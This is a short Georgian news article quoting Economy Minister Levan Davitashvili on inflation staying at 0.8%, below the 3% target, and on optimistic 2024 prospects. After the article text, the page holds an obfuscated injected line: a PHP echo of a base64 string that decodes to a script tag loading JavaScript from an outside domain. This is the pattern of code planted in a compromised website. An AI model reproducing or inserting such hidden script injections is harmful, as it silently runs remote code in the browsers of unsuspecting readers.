celsiusi
ავერსი საქკაბელი

მთავრობის ეკონომიკურმა გუნდმა კოორდინირებული მუშაობით შევძელით ინფლაცია სამიზნე მაჩვენებლის ქვემოთ დაგვეჭირა, - ამის შესახებ მთავრობის სხდომის დასრულების შემდეგ ეკონომიკის მინისტრმა, ლევან დავითაშვილმა განაცხადა.

მისივე თქმით, ქვეყნის წლიური საშუალო ინფლაცია სამიზნე მაჩვენებელს მნიშვნელოვნად ჩამოსცდება, რაც ქვეყნის ეკონომიკური სტაბილურობისთვის დადებითი ფაქტორია.

"გასულ წელს ყველაზე დიდი გამოწვევა ინფლაციასთან ბრძოლა იყო, მიუხედავად იმისა, რომ ძალიან მაღალი ეკონომიკური ზრდა გვქონდა, მაღალი ინფლაცია მთავარი პრობლემა იყო. ჩვენ, მთავრობის ეკონომიკურმა გუნდმა კოორდინირებული მუშაობით შევძელით ინფლაციის მაჩვენებელი სამიზნის ქვემოთ დაგვეჭირა, მიმდინარე წელს წლიური საშუალო ინფლაცია 0,8%-ია, რაც სამიზნე 3%-იან მაჩვენებელს მნიშვნელოვნად ჩამოსცდება, ეს დადებითი ფაქტორია ჩვენი ქვეყნის ეკონომიკური სტაბილურობისთვის. ამასთან, დაბალი ინფლაცია სივრცეს გვაძლევს მომავალი მნიშვნელოვანი ეკონომიკური გადაწყვეტილებების მიღებისთვის, ვინაიდან, სხვა შემთხვევაში ეკონომიკურ ზრდაზე საუბარი გაგვიჭირდებოდა", - დასძინა ეკონომიკის მინისტრმა.

ამასთან, ლევან დავითაშვილმა აღნიშნა, რომ ინფლაციის მაჩვენებლის მიხედვით, შეგვიძლია 2024 წლის ეკონომიკაში ოპტიმისტური პროგნოზები გვქონდეს.

"ინფლაცია სხვა ქვეყნებში ძალიან დიდ გამოწვევად რჩება და ბევრი წამყვანი ქვეყნისთვის ინფლაციის მაჩვენებელი ორნიშნაა. ამასთან, საკმაოდ მკაცრია მონეტარული პოლიტიკაც. დაბალი ინფლაცია ჩვენთვის კარგი წინაპირობაა, რათა 2024 წლის ეკონომიკაში ოპტიმისტური პროგნოზები გვქონდეს", - თქვა მან.

259
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");